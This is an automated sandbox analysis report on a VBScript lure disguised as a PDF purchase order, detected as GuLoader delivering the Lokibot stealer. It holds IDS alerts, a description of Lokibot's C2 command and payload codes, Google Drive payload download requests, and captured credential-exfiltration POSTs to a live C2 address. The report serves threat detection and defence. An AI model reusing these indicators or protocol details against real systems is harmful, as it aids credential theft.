Windows Analysis Report
SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: SOLICITUD DE PEDIDO (Universidade de So Paulo (USP))09-30-2024pdf.vbs
Analysis ID: 1523156
MD5: 8de3bba9fb959d08b3719f1281957c56
SHA1: b8132af0e02ecb58c3c3eb39fe919e3b805106cf
SHA256: c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25
Tags: Lokivbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: http://137.184.191.215/index.php/check.php?s=am9ntjjw Virustotal: Detection: 14% Perma Link
Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Virustotal: Detection: 12% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.3% probability
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49748 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49746 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49746 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49746 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49746 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49747 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49747 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49747 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49747 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Joe Sandbox View IP Address: 137.184.191.215 137.184.191.215
Source: Joe Sandbox View ASN Name: PANDGUS PANDGUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 142.250.184.238:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
